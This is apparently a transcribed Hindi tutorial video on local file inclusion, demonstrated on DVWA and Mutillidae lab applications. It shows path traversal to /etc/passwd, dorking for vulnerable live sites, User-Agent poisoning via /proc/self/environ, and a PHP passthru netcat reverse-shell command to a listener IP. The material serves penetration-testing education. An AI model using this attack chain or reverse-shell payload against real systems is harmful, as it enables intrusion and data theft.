यहाँ पे आज मैं रिकॉर्डिंग, ओके ठीक है, आज हो रहा है। आज मेरा यहाँ पे वॉइस पे रिकॉर्ड हो रहा था। कल एक्चुअली ये जो था मेरा, ये जो अभी हो रहा है ऑडियो इनपुट कैप्चर, ये ढंग से का मतलब ये इनेबल नहीं था। पहले ये ऐसे था, तो पहले यहाँ पे टिक लगा हुआ था। दैट मीन्स कि मेरी वॉइस नहीं आ रही थी। तो जैसे कि ये अभी ब्लैक एंड वाइट है, तो दैट मीन्स ये रिकॉर्ड नहीं हो रहा है। ये ग्रीन में है तो ये रिकॉर्ड हो रहा है। तो कल ये ब्लैक एंड वाइट में था, यानी ये अनेबल था, डिसेबल हो रखा था। सो दैट्स वाई वॉइस रिकॉर्ड नहीं हुई। ठीक है, तो ये आ गया हमारे मेटास्प्लोइटेबल। तो आज का जो हमारा टॉपिक है, ओके, तो आज के टॉपिक के लिए यार मैंने पीपीटी प्रिपेयर नहीं करी, बाहर चला गया था मैं एक्चुअली। तो बेसिकली मैं थ्योरेटिकल बता देता हूँ। तो अब दिया, चलो रुको, तुमको मैं पीपीटी दे दूंगा, लेकिन समझाने के लिए मैं यहाँ पे ऑनलाइन पेंट का यूज़ कर लेता हूँ। ठीक है, तो आज का मैं टॉपिक बता दूँ तुम लोगों को कि अ, आज हम लोग जानने वाले हैं लोकल फाइल इंक्लूजन। ठीक है, अब ये लोकल फाइल इंक्लूजन क्या है, वो हम देखते हैं कि एक्चुअल में ये क्या है और इसको कैसे परफॉर्म किया जाता है। ठीक है, तो जस्ट एक मिनट में इसको पहले बैक ब्लैक कर दूं बैकग्राउंड। तो इन केस सपोज आपके पास एक वेबसाइट है। ठीक है, तो अब वहां पे, जैसे कि सपोज करो ये एक वेबसाइट है और इसका एक लिंक है या डोमेन है। ठीक है, जो किसी पर्टिकुलर डायरेक्टरी को या किसी पर्टिकुलर फाइल को पॉइंट आउट कर रहा है। अब किसी पर्टिकुलर फाइल को पॉइंट आउट कर रहा है इन द सेंस, जैसे कि अ, ठीक है, सो सपोज करो कि वो क्या कर रहा है कि वो, जैसे कि यहाँ पे इंडेक्स, अरे यार इसमें ब्लैक पे नहीं होता क्या, इंडेक्स डॉट पी एच पी क्वेश्चन मार्क फाइल या पेज इक्वल्स टू, अब यहाँ पे है जैसे कि, या इसको हम कह देते हैं लॉगिन डॉट पी एच पी। ओके, सो एज यू ऑल कैन सी कि यहाँ पे हमारे पास जो चीज़ आ रही है वो तुम लोग यहाँ पे देख सकते हो, ये रही। ठीक है, दैट मीन्स कि यहाँ पे हमारे पास क्या पॉइंट हो रहा है, लॉग इन डॉट पी एच पी। बट अब यहाँ पे हो क्या रहा है, जैसे कि इंडेक्स डॉट पी एच पी क्वेश्चन मार्क पेज इक्वल्स टू लॉग इन डॉट पी एच पी, यानी पेज जो पैरामीटर है वो लॉग इन डॉट पी एच पी को पॉइंट आउट कर रहा है। ठीक है, और पॉइंट आउट कर रहा है दैट मीन्स कि ये जो फाइल है वो कहीं ना कहीं से तो उठा रहा है, तभी तो यहाँ पे हमको शो कर रहा है। अब ये जो फाइल है, ये जो फाइल सिर्फ ये वाली, तो ये कहीं ना कहीं पे सर्वर पे तो अपलोड है। ठीक है, इसलिए यहाँ पे हमको देखने को मिले सर्वर से ही तो उठाएगा वो, और तो कहीं इसके पास ऑप्शन नहीं है। ठीक है, तो दैट मीन्स कि ये सर्वर पे कहीं ना कहीं पे अपलोडेड है। ठीक है, तो अगर हम सर्वर की कुछ सेंसिटिव फाइल्स को देख लें, कुछ यहाँ पे मैनिपुलेट करके या छेड़ाछाड़ी करके, ठीक है, तो वहां पे लोकल फाइल इंक्लूजन होगी। सपोज करो कि अगर हम किसी इंटरनल फाइल को देख लें, जैसे कि ईटीसी पासवर्ड फाइल्स को देख लें या किसी ऐसी फाइल्स को देख लें जो तुमको वेब एप्लीकेशन पे देखने को नहीं मिल रही है। ठीक है, तुम उसको नॉर्मली एक्सेस नहीं कर सकते हो। तो वहां पे हमको क्या करना रहता है कि हमको कुछ छेड़ा-छाड़ी लगा के, जैसे कि हम लोग डायरेक्टरीज को आगे पीछे करके हम लोग जाते हैं। अब डायरेक्टरीज आगे पीछे कैसे होती हैं, और यहाँ पे होती हैं डॉट डॉट स्लैश डॉट डॉट स्लैश डॉट डॉट स्लैश। तो ऐसे करते करते हम लोग जाते हैं डायरेक्टरीज के बैक में।
ठीक है, यानी यहाँ पे एक ये डॉट डॉट स्लैश आ गया यानी एक डायरेक्टरी बैग, फिर से डॉट डॉट आ गया फिर यानी दो डायरेक्टरी बैग, फिर से डॉट डॉट आ गया यानी तीन डायरेक्टरी बैग। तो हम क्या करेंगे, यहाँ लॉगिन डॉट पी की जगह पे हम करेंगे क्या कि एक्चुअल में हम लोग यहाँ पे लॉगिन डॉट पी की जगह पे हम कुछ और दे देंगे। ठीक है, यहाँ पे हम अपना पेज दे देंगे जो हमको यहाँ पे इंटरनल फाइल का एक्सेस करना है, यानी जो सर्वर पे अपलोडेड है। ठीक है, तो यहाँ पे हमको जो सर्वर से कोई क्रिटिकल फाइल को एक्सेस करना है। ओके ओके, सो यहाँ दैट मीन्स कि तो यहाँ पे अगर हम ये कर दूँ मैं, और यहाँ पे अगर पेज इक्वल्स टू, ओके, ब्लैक में इक्वल्स टू हम यहाँ पे स्लैश ई टी सी स्लैश पास डब्ल्यू डी, ठीक है, ये कर देते हैं। ठीक है, तो ये फाइल हम लोग एक्सेस कर रहे हैं एक्चुअल में। तो अब ये पहले ही तो डायरेक्टरी में हमको मिल नहीं जाएगा, क्योंकि कई सारी ऐसे डायरेक्टरीज होती हैं जिन पे वेब सर्वर अपलोडेड होते हैं या वेबसाइट तुम्हारी अपलोड होती है। ठीक है, तो हम कुछ डायरेक्टरी बैक्स जाते हैं। बैक किससे जाते हैं, यहाँ पे ये ऐसे करके बैक जाते हैं। तो यहाँ पे कई सारे केस सिनेरियोज रहते हैं वेबसाइट्स पे, तो हम एक एक करके वो सारे केस सिनेरियोज को देखेंगे एंड हर एक वो मेथड देखेंगे जिससे हम लोग लोकल फाइल इंक्लूजन फाइंड कर सकते हैं। और अगर आप ये वल्नरेबिलिटी फाइंड कर लेते हैं देन आपके पास कह सकते हो रिपोर्ट जब कराओगे आप, तो आपके पास एक अच्छी अपॉर्चुनिटी होती है, आपको वहाँ पे अच्छी बाउंटी मिलती है। एंड यहाँ पे आपके पास कुछ ऐसी अपॉर्चुनिटीज़ भी रहती हैं जिसमें आप लोग कह सकते हो कि यहाँ पे आप लोग कह सकते हो कि रिवर्सल भी ले सकते हो लोकल फाइल इंक्लूजन से। बट कई की बार वो जो फाइल रहती है वो डिसअलाउड रहती है, वो कई की वेब सर्वर्स में अलाउ नहीं करे रहती कि उस फाइल को तुम लोग लाइक एक्सेस कर सकते हो या उसके अंदर का कंटेंट वगैरह देख सकते हो। ठीक है, तो यहाँ पे अगर हमारे इस पे नहीं होगी तो मैं क्या करूँगा कि मैं उसको अलाउ कर दूंगा, एग्जीक्यूटेबल बना दूंगा। ठीक है, एंड देन आप लोगों को फॉर द डेमो पर्पस मैं आप लोगों को यहाँ पे दिखा दूंगा कि कैसे एक्चुअल में यहाँ पे हम लोग एक्सेस कर सकते हैं रिवर्सल। ठीक है, तो फटाफट से हम लोग अपने जाते हैं लैब में, और लैब में जाके यहाँ पे हम लोग प्रैक्टिकल करते हैं। ओके, तो सो एज ए कैन से कि ये हमारा लैब एंड हम लोग मटिल्डे और कह सकते हो डीवीडब्ल्यू दोनों में देखेंगे। तो सबसे पहले हम लोग जाते हैं डीवीडब्ल्यू में और फटाफट से लॉगिन हो जाते हैं। ओके, सो यहाँ पे अभी हाई सेटिंग्स हैं तो यहाँ पे हम लोग इसको लो पे कर देते हैं। एंड जस्ट एज यू कैन सी फाइल इंक्लूजन दैट मीन्स कि लोकल फाइल इंक्लूजन, और एक और इसके जैसा है जो कि है रिमोट फाइल इंक्लूजन। तो रिमोट फाइल इंक्लूजन हम लोग आज नहीं देखेंगे, आज हम लोग बस लोकल फाइल इंक्लूजन पे फोकस ये चीज़ों को देखेंगे। एंड देन उसके बाद कल हम लोग रिमोट फाइल इंक्लूजन को अच्छे से समझेंगे। और रिमोट फाइल इंक्लूजन इतना बेस्ट है कि कह सकते हो आप कि वहाँ से आप लोगों को कह सकते हो कि एक आपको उससे रिवर्सल मिल जाता है। उससे अगर आपने रिमोट फाइल इंक्लूजन फाइंड कर ली तो देन आप कह सकते हो कि उससे सक्सेसफुली 100% है कि आप लोग रिवर्स कनेक्शन ले सकते हो। ओके, सो विदाउट वेस्टिंग एनी फर्दर चलो हम लोग चलते हैं अपने फाइल इंक्लूजन पे। तो एज यू कैन सी कि यहाँ पे एक पेज पैरामीटर है। तो अब आप लोग सोच रहे हो कि हम कौन कौन से ऐसे पैरामीटर्स हैं जहाँ पे हम लोग ट्राई कर सकते हैं। तो मैं बता दूँ, क्वेश्चन मार्क पेज, ठीक है, क्वेश्चन मार्क फाइल, क्वेश्चन मार्क dir, ठीक है, देन क्वेश्चन मार्क लोकेशन, देन और भी थे आई गेस कि फाइल आईडी, ठीक है, व्यू फाइल, ठीक है। तो ये सारे आप लोग इनको आप लोग डॉर्क से भी फाइंड कर सकते हो। जैसे कि आप फाइव ने फाइल चूज किया तो आप इसको कॉपी कर लो। तो अब इसके हम लोग एक डॉर्क बनाते हैं। तो इन URL इंडेक्स डॉट PHP एंड ये पेस्ट कर दो फाइल इक्वल्स टू, ठीक है। तो अब यहाँ पे ये डॉर्क हमने बनाया एंड जस्ट
कॉपी किया, ऐसे ही आप कोई भी डॉक बना सकते हो। एंड यहाँ पे लाके पेस्ट एंड गो। तो यहाँ पे हमसे ये पूछा जाएगा, तो हम लोग इसको कंटिन्यू करते हैं एंड यहाँ पे हम देखते हैं कि हमारे पास कोई साइट्स आती हैं कि नहीं। हाँ। इंडेक्स हटा देते हैं। ठीक है, इंडेक्स में भी प्रॉब्लम कर रहा हो। साइट डॉट इन। इधर पे तुमको कुछ नहीं मिला। तो यहाँ पे तुमको कुछ नहीं मिला, चलो कोई नहीं। मैं तुम लोगों को एक साइट दूंगा एंड हम लोग देखते हैं कि यहाँ पे कौन कौन सी चीज़ें हैं, कहाँ कहाँ से हम लोग फाइंड कर सकते हैं। पहले हम लोग फाइंड करने पे ध्यान देते हैं, तो रियल लाइफ साइट्स मैं ढूंढ के देता हूँ। हम लोग हमारे लैब में जाते हैं। तो यहाँ पे हमको बोल रहा है टू इंक्लूड अ फाइल, एडिट द क्वेश्चन मार्क पेज इक्वल्स टू इंडेक्स डॉट पी एच पी इन द यूआरएल टू डिटरमाइन विच फाइल इज इंक्लूडेड। दैट मीन्स हमको बोल रहा है कि हमको यहाँ पे इंडेक्स डॉट पी एच पी करना है। ठीक है, तो इंडेक्स डॉट पी एच पी किया एंड यहाँ पे आप लोग देख सकते हो कि यहाँ पे विथ सम काइंड ऑफ एरर हमको शो हो रहा है, जो कि एक पार्शियल एरर है। ठीक है, यानी यहाँ पे जो मेमोरी साइज थी वो कुछ समथिंग मेमोरी साइज से रिलेटेड है। तो अब हम लोग यहाँ पे देखते हैं कि ये लाइन 1 पे ही प्रॉब्लम है, सो आई डोंट नो क्या है। तो यहाँ पे हमारे पास, हमको तो ये मालूम है कि ये फाइल है हमारे पास, और हमको ये भी मालूम है कि हम अगर बैक जाते हैं तो इंक्लूड डॉट पी एच पी भी हमारे पास फाइल है। ठीक है, तो अगर हम यहाँ पे नज़र मारें आगे जाके, तो यहाँ कितनी डायरेक्टरी के बाद है ये फाइल? एक डायरेक्टरी, दो, तीन, चार, पाँच, यानी पांच डायरेक्टरी के बाद में ये फाइल आती है। तो दैट मीन्स कि अगर हम पांच डायरेक्टरी बैक चले जाएं तो हम लोग रूट डायरेक्टरी में चले जाएंगे। ये तो ऑब्वियस सी बात है, क्योंकि अगर हम यहाँ से पांच डायरेक्टरी बैक चले गए तो वो हम लोग रूट डायरेक्टरी में होंगे। एंड वहां से अगर हम लोग स्लैश ई टी सी स्लैश पास डब्ल्यू डी फाइल एक्सेस करने का ट्राई करते हैं, और अगर हम सक्सेसफुली एक्सेस कर लेते हैं, तो यहाँ पे लोकल फाइल इंक्लूजन वल्नरेबिलिटी है। सो लेट्स ट्राई फॉर इट। कॉपी एंड यहाँ पे आए एंड यहाँ पे हमने ये पेज किया, और इसकी जगह पे हमने डॉट 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 डॉट। ठीक है, सो एक, दो, तीन, चार, पाँच। तो अभी अगर हम इसको कॉपी करते हैं एंड इंडेक्स डॉट पी एच पी इसकी जगह पे पेस्ट करते हैं और हिट एंटर करते हैं, तो वार्निंग इंक्लूड दिस समथिंग अब आ तो रहा है, बट सम काइंड ऑफ एरर शो हो रहा है हमें। तो हमको एरर पे ध्यान नहीं देना है, हम इसको हटाते हैं। स्लैश ई टी सी स्लैश पास डब्ल्यू डी, हम इसको एक्सेस करने का ट्राई करते हैं। ओके, सो एज यू कैन सी कि यहाँ पे हमारे पास ये एक्सेस हो गई है। अगर मैं आपको मेरे नॉर्मल लाइनक्स में दिखाऊं इस फाइल को एक्सेस करके, तो आप देखोगे सीडी, अगर मैं रूट में चले जाऊँ और अगर मैं पी डब्ल्यू डी दिखाऊं, तो यहाँ पे स्लैश, ठीक है, तो स्लैश जो रहती है वो डायरेक्टली रूट के लिए होती है। ओके, सो यहाँ पे अगर मैं भी करता हूँ कैट स्लैश ई टी सी स्लैश पास डब्ल्यू डी एंटर करता हूँ, तो ये देखो कुछ ऐसा ही आ रहा है, रूट समथिंग ऐसा लिख के आ रहा है। तो और यहाँ पे भी हमको ऐसे दिख रहा है। दैट मीन्स कि हमने सक्सेसफुली यहाँ पे हमने एक्सेस कर लिया है, और लोकल फाइल इंक्लूजन वल्नरेबिलिटी को हमने फाइंड कर लिया, और फाइल को हमने जो सक्सेसफुली यहाँ पे एक्सेस कर लिया। ओके, तो जस्ट एक मिनट।
ठीक है। तो अभी यहाँ पे पहले क्या होता था कि पहले यहाँ पे एक डायरेक्टरी हुआ करती थी, cd/proc self, और यहाँ पे एक फाइल हुआ करती थी environ करके, इन environ। ठीक है। तो अगर मैं इसको कैट करके दिखाऊं तो यहाँ पे कह सकते हो पहले हमारी कुछ पर्सनल इंफॉर्मेशन आती थी। अब पर्सनल इंफॉर्मेशन इन द सेंस कौन सी, हमारे ब्राउज़र की इंफॉर्मेशन। बट अभी ये फाइल को हटा दिया गया है। ठीक है। अब आई डोंट नो क्यों, या ये फाइल में चेंजेस ला दिए गए हैं। ठीक है। यहाँ पे ये सारे कुछ समथिंग अलग ही ला दी गई है। ठीक है। तो अब यहाँ पे हम लोग पहले क्या करते थे कि हम लोग इधर पे ये जो फाइल थी हम लोग नॉर्मली यहाँ से एक्सेस करने का ट्राई करते थे, इधर से। ठीक है। एंड उस पर हमारे जो ब्राउज़र के इन्फॉर्मेशन जाते थे, तो ब्राउज़र के इन्फॉर्मेशन में हम लोग कोड इंजेक्ट करके रिमोट कोड एग्जीक्यूशन परफॉर्म करके रिवर्सल ले लेते थे। तो अगर मैं इसको एक्सेस करने का ट्राई भी करूँ यहाँ से, ठीक है, तो यहाँ पे देखो, ओके, यहाँ पे आ तो गई है। ओके, सो एक मिनट, यहाँ पे कुछ और दिख रहा है, यहाँ पे कुछ और। ओके, ठीक है, चलो। सो एज यू कैन सी कि यहाँ पे हमारे पास ये फाइल एक्सेसेबल है। तो यहाँ पे HTTP यूज़र एजेंट जो है, इससे हम लोग रिवर्सल लेते थे। अब कैसे लेते हैं वो हम एट द एंड में देखेंगे। ठीक है। तो आप लोग ट्राई कर सकते हो, कई के वेबसाइट्स में ये फाइल जो रहती है वो अलग रहती है, एंड कई बार में खुल जाती है। जैसे कि अगर आप किसमें जो ओवास्प का ब्रोकन वेब एप्लीकेशन है उसमें अगर आप DVW में खोलने का ट्राई करोगे तो वहाँ पे नहीं खुलता है। आई डोंट नो क्यों, उसमें सेटिंग्स ही ऐसी बना रखी है या उसमें परमिशन ही नहीं है एग्जीक्यूटेबल की। ठीक है। तो यहाँ पे हमको परमिशन मिल गई है। ठीक है। तो यहाँ पे कई सारे ऐसे चीज़ें हैं जिसमें हम लोग अपना कोड इंजेक्ट कर सकते हैं। और आप लोगों को अगर कहीं पे भी ऐसी कोई फाइल मिलती है साइट में भी, जरूरी नहीं हो कि आप लोग लोकल फाइल इंक्लूजन से, अगर आपको कोई ऐसी साइट भी मिलती है जहाँ से आप लोग HTTP यूज़र एजेंट या नॉर्मल यूज़र एजेंट या अपग्रेड इनसिक्योर रिक्वेस्ट, होस्ट, ऐसे जो होस्ट जा रहा हो, रिडायरेक्ट स्टेटस, समथिंग ऐसे कुछ आपके जो ब्राउज़र की इंफॉर्मेशन जा रही है, यानी जो आपके रिक्वेस्ट की इंफॉर्मेशन होती है वो जा रही है, तो आप लोग वहाँ से कह सकते हो कि रिवर्सल लेने का ट्राई कर सकते हो। ठीक है। वहाँ से आप लोग रिवर्सल ले लो। ठीक है। अब कैसे लेंगे वो मैं बताऊंगा। ठीक है। बट उससे पहले हम लोग यहाँ पे ये देख लेते हैं कि एक्चुअल में कौन कौन से मेथड्स होते हैं लोकल फाइल इंक्लूजन फाइंड करने के। तो अगर मैं अभी वहीं कॉप ठीक है, अभी हम मटिल्डे पे जाते हैं, कुछ और केस सिनेरियोज हैं हमारे पास यहाँ पे, तो हम इसको देख लेते हैं। सो यहाँ पे अगर हम यहाँ पे जाते हैं इंजेक्शन पे, नहीं, कहाँ पे था, सिक्योरिटी मिसकॉन्फ़िगरेशन, नहीं, तो यहाँ पे इनसिक्योर डायरेक्ट ऑब्जेक्ट रेफरेंस, दैट मीन्स आईडोर की वल्नरेबिलिटी। ठीक है। ये एक ब्रोकन एक्सेस कंट्रोल की वल्नरेबिलिटी। तो यहाँ पे सोर्स व्यूअर और टेक्स्ट फाइल, इन दोनों पे आप लोग ट्राई कर सकते हो। और एक यहाँ पे आर्बिट्री फाइल इंक्लूजन भी है। तो अगर हम इस पे जाते हैं, आर्बिट्री फाइल इंक्लूजन करंट पेज दिस, तो आप लोग जैसे कि मैंने बताया कि यहाँ से वो आप लोग चेंज करके देख सकते हो। ठीक है। तो सबसे पहले बार आपको ETC पास WD ही देना है। तो यहाँ पे हमको पहले डायरेक्टरी पे ही मिल गया, दैट मीन्स ये रूट डायरेक्टरी पे ही वेबसाइट होस्ट हो रही है। तो इसने ये गड़बड़ी कर दी, चलो ठीक है। बट यहाँ पे तो नॉर्मल केस था। अगर हम टेक्स्ट फाइल व्यू पे जाते हैं, यहाँ पे अगर हम इस फाइल को देख रहे हैं, तो क्या ऐसा कुछ हो सकता है, अब जैसे कि ये जो फाइल्स हैं ये भी तो सर्वर पे ही अपलोडेड होंगी, तुमको इतना तो मालूम ही है कि ये जितनी भी फाइल्स हैं सर्वर पे अपलोड है, तभी तुम लोग यहाँ पे देख पा रहे हो। तो अभी हम इनको मैनिपुलेट करेंगे। मैनिपुलेट कैसे करेंगे वो भी हम देखते हैं। अब यहाँ पे आपको राइट क्लिक करना है, इंस्पेक्ट क्लिक करना, एंड यहाँ पे नेम टेक्स्ट फाइल ID ये, और यहाँ पे राइट क्लिक करना, एंड यहाँ पे आप देख सकते हो उन सारे की वैल्यू यहाँ पे आ रही है। ठीक है। तो आपको वैल्यू वाली जो फ्लो है इसको आपको /etc/pass/wd कर देना है और एंटर कर देना, और इसका भी नाम आपको चेंज कर देना है, /etc/pass/wd एंटर कर देना है। ठीक है। तो पहले में अगर आप अभी देखोगे तो यहाँ पे /etc/password वाली फाइल को ये लोग एक्सेस करने के लिए बोल रहे हैं।
ठीक है, तो ये हमारा दूसरा मेथड हो गया। पहले तो हमने लिंक से देख लिया, ठीक है, कैसे फाइंड करते हैं। ये हमारा दूसरा मेथड हो गया, जो सोर्स कोड में एडिट करके हम लोग कर सकते हैं। अगर हम यहाँ पे व्यू फाइल पे क्लिक करते हैं एंड सक्सेसफुली यहाँ पे हम लोग, अगर हमको इस फाइल का जो डेटा है वो रिट्रीव हो जाता है, देन कॉन्ग्रेचुलेसन, आप लोगों ने सक्सेसफुली लोकल फाइल इंक्लूजन फाइंड कर लिया। ठीक है, तो 3 2 1 बूम, ये देखो यहाँ पे हमारे पास ये आ गया। ठीक है, तो यहाँ पे ये सारी चीज़ यहाँ पे देख सकते हो कि यहाँ पे आ चुकी है। ठीक है, ऑल ओवर यहाँ पे इंफॉर्मेशन जितनी भी है वो सब आ चुकी है। तो ये था हमारा एक मेथड और। ठीक है, तो अब यहाँ पे हमारे हमने दो मेथड देख लिए। अब कौन से मेथड बचे हैं? चलो अब एक और मेथड देख लेते हैं, बट एक मिनट, ये कौन मैसेज कर रहा है बार बार? कौन है रे ये? चलो ठीक है, फालतू के मैसेज आ रहे हैं। तो अब एक तो मेथड ये था, अगर ये मेथड काम ना करे देन एक और मेथड बताता हूं मैं, जो कि थोड़ा एडवांस रेड टीमिंग का मेथड या ऑफेंसिव वे में। ठीक है, या मोस्ट ऑफ द टाइम बग हंटर्स यूज करते हैं इसको। तो आपको इंटरसेप्शन ऑन कर लेना है एंड जैसे यहाँ पे आप व्यू फाइल पे क्लिक करोगे तो यहाँ पे आपके पास रिक्वेस्ट आ जाएगी। तो आपके पास टेक्स्ट फाइल ये, तो ये फाइल आप लोग व्यू व्यू कर रहे हो, यहाँ पे डॉट टी एक्स टी आ रही, तो यहाँ पे आपको स्लैश ए टी सी स्लैश पास डब्ल्यू डी लिख देना है। ठीक है, और आपको इस पर फॉरवर्ड कर देना है। तो एज ए कैन सी, ये लो फाइल ए टी सी स्लैश पासवर्ड, और यहाँ पे ये देखो मिल गया आपको। ठीक है, तो हमने ये एक और मेथड देख लिया है। और यहाँ पे अगर मैं एक और पे दिखाऊं, जैसे सोर्स कोड, अरे यार, सोर्स कोड व्यूअर। ठीक है, तो अब यहाँ पे बहुत सारी फाइल्स है यहाँ पे भी एज यूजल। तो इसमें बस क्या है कि कौन से पेज में क्या कह सकते हो सोर्स कोड लगा रखा है, वो इन लोगों ने यहाँ पे दे रखा है। लॉगिन डॉट पी का फाइल देखो, तो यहाँ पे ये सारी सोर्स कोडिंग लगा रखी है। कुछ ज़्यादा ही सोर्स कोडिंग है यार। हाँ यार, सच में ज़्यादा है। ठीक है, तो एक मिनट, डॉक्यूमेंट गेट एलिमेंट बाय आईडी लॉगिन यूजर नेम डॉट फोकस, अच्छा ठीक है। ठीक है, तो यहाँ पे ऊपर जाते हैं तो यहाँ पे ये कुछ फाइल्स है, सो लॉग डॉट पी एच पी, तो यहाँ पे ये कुछ नॉर्मल से, हाँ। तो अब यहाँ पे भी वही सेम चीज़ आप लोग अप्लाई कर सकते हो जो मैंने अभी पिछले दो मेथड आपको बताया। ठीक है, राइट क्लिक करो, इंस्पेक्ट करो, और ये करके यहाँ पे अगर नॉर्मल आप स्लैश ए टी सी स्लैश पास डब्ल्यू डी नॉर्मल वैल्यू भी बस चेंज कर देते हो, नाम ना चेंज करो, तो व्यू फाइल क्लिक करोगे तो यहाँ पे आ जाएगा। ठीक है, ये देखो आ गया। ठीक है, और भाई एक जो चीज़ था सेम यहाँ पे, जो कि यहाँ पे ये पी एच पी फाइल पेज, अच्छा नहीं, ये तो पेज है सोर्स पे, ये पी एच पी फाइल। ठीक है, स्लैश ए टी सी स्लैश पास डब्ल्यू डी एंड जस्ट फॉरवर्ड, तो भी यहाँ पे वही चीज़ सेम चीज़ आ जाएगी। ठीक है, तो यहाँ पे हमने मेथड्स तो देख लिए कि एक्चुअल में कैसे काम करती हैं चीज़ें एंड ऑल ओवर दीज थिंग्स। तो अब यहाँ पे करना क्या है? तो अभी हमको करना क्या है कि ये हमने ये सारे मेथड्स तो देख लिए। ठीक है, कि कैसे यहाँ पे हम लोग लोकल फाइल इंक्लूजन वल्नरेबिलिटी को फाइंड करते हैं। बट अभी यहाँ पे, अरे यार कौन मैसेज करे जा रहा है? एक मिनट, जस्ट वेट अ मिनट। ठीक, अभी हम लोग जैसे कि यहाँ पे हमने ये देखा था, अब यहाँ से हम लोग रिवर्सल लेने का ट्राई करेंगे। कैसे रिवर्सल लेने का ट्राई करेंगे? बेसिकली नेट कैट के थ्रू हम लोग रिवर्सल लेने का ट्राई करेंगे यहाँ पे। एंड एक मिनट, चार्जिंग हटा देता हूँ। यहाँ
अभी हम लोग करते क्या है कि एक हमारा कोड जो है रिवर्सल का वो हम जनरेट करते हैं, जो कि बेसिकली नेट कैट का ही होगा। ठीक है, तो यहाँ पे वही नॉर्मल सबसे पहले हम लोग देखेंगे कि क्या हमारा पीएचपी कोड बैकएंड पे जाके रन हो रहा है। पीएचपी इन्फो, और ये कोड हम बस डालेंगे। अगर ये कोड सक्सेसफुली बैकएंड पे रन हो रहा है जाके और पीएचपी की इन्फॉर्मेशन हमको शो होने लग जाती है, देन हम लोग रिमोट कोड एग्जीक्यूशन यहाँ से परफॉर्म कर सकते हैं लोकल फाइल इंक्लूजन से। हमने वापस से इसको रिफ्रेश किया एंड यहाँ पे यूज़र एजेंट की इन्फॉर्मेशन आपको इस फाइल में शो हो रही थी, तो आप लोग इसको यहाँ पे, अरे लगा दो पीएचपी इन्फॉर्मेशन फॉरवर्ड, एंड एज यू कैन सी कि हमको पीएचपी की इंफॉर्मेशन शो होने लग गई। दैट मीन्स हमारा पीएचपी का जो कोड है वो बैकएंड पे एग्जीक्यूट कर रहा है। ओके, क्या हो गया? ठीक है, तो यहाँ पे जो कह सकते हो कोड है वो हमारा बैकएंड पे एग्जीक्यूट कर रहा है। तो अब हम इससे रिवर्सल ले सकते हैं, इतना तो हमें मालूम चल गया है। ठीक है, तो यहाँ पे देखो ऑल ओवर हमारे पास पीएचपी की इंफॉर्मेशन इसकी आ रही है। तो अभी हम लोग यहाँ पे फटाफट से एक पीएचपी का कोड जनरेट करते हैं। ये हमारा कोड था, तो बस हमको यहाँ पे क्या कर देना है, पास थ्रू फंक्शन को यूज करना है और यहाँ पे nc-e/bin/bash या sh192.168.29.514455। बस हमारा कोड रेडी है सक्सेसफुली एंड इसको हम कॉपी करते हैं। कॉपी करने के बाद अब यहाँ पे होगा क्या कि, अरे यार बार बार ये काहे खुल जा रहा है। इंटरसेप्ट को हम ऑन करते हैं एंड जस्ट रिफ्रेश करते हैं पेज, एंड यहाँ से हम लोग यूजर एजेंट पे वापस से अपना कोड लगा देते हैं पास थ्रू फंक्शन, एंड उससे पहले हम लोग नेट कैट को लिसनिंग मोड पे लगा देते हैं। हिट एंटर एंड जस्ट फॉरवर्ड। तो अब यहाँ पे देखो कि अगर हम वापस बैक जाए और यहाँ पे देखें कि रिवोर्स शेल हमको मिला कि नहीं मिला, तो देखते हैं। और यहाँ पे तुम लोग देख सकते हो कि यहाँ पे हम लोगों ने सक्सेसफुली रिवर्सल एक्सेस कर लिया है विद द हेल्प ऑफ लोकल फाइल इंक्लूजन। ठीक है, जो कि यहाँ पे काफ़ी क्रिटिकल थिंग है। ठीक है, यानी काफ़ी क्रिटिकल कह सकते हो ये वल्नरेबिलिटी है, क्योंकि ये हमको रिमोट फाइल इंक्लूजन वल्नरेबिलिटी, जी सॉरी, एक मिनट यार, हाँ, लोकल फाइल इंक्लूजन वल्नरेबिलिटी जो है ये हमको रिमोट कोड एग्जीक्यूशन परफॉर्म करने को देता है। ठीक है, तो यहाँ पे हम पास थ्रू फंक्शन के साथ या सिस्टम फंक्शन के साथ हम लोग ट्राई कर सकते हैं यहाँ पे और भी चीज़ें करने के लिए। ठीक है, तो अब यहाँ पे आप लोग देख ही सकते हो कि हमको रिवर्स कनेक्शन मिल गया, और बेसिकली ये सारी चीज़ें आप लोगों को कोई और बग बाउंटी के प्रोग्राम्स में नहीं सिखाता है। ठीक है, तो यहाँ पे हम लोग कैंसिल कर देते हैं। तो ऑल ओवर कह सकते हो कि ये हमने यहाँ पे चेक किया। अब यही सेम केस तुम लोग कहीं कहीं पे भी कर सकते हो। अगर आपको मटेरियल पे करना है तो आप लोग मटेरियल पे कर सकते हो, कॉपी पेस्ट एंड गो, मटेरियल टेक्स्ट फाइल व्यू, इंस्पेक्ट, एंड यहाँ पे वैल्यू मैं इसकी चेंज कर देता हूँ, स्लैश प्रॉक सेल्फ इन्वायरन। ठीक है, एंटर, व्यू फाइल। तो यहाँ पे रिडायरेक्ट हैंडल HTTP होस्ट कंटेंट लेंथ कंट्रोल। तो यहाँ पे कई सारी चीज़ें दिख रही हैं। दैट मीन्स कि यहाँ पे हमको HTTP ओरिजिन भी यहाँ पे सेफ हो रहा है। ठीक है, और कंटेंट टाइप भी यहाँ पे सेफ हो रहा है, कंटेंट टाइप भी सेफ हो रहा है, यानी कंटेंट टाइप पे भी। और यहाँ पे हाँ, ये देखो यूज़र एजेंट भी सेफ हो रहा है। तो यहाँ पे हम लोग यूज़र एजेंट को अभी यूज़ करके यहाँ पे हम लोग ये कर सकते हैं। ठीक है, रिफ्रेश करते हैं, कंटिन्यू, एंड हम लोग यहाँ पे प्रॉक सेल्फ इन्वायरन एंड यहाँ पे यूज़र एजेंट पे हम लोग अपना कोड इंजेक्ट कर देते हैं, जो कि हमारा ये कोड था बी, और यहाँ पे नेट कैट के लिसनिंग हम लोग लगा देते हैं, फॉरवर्ड।
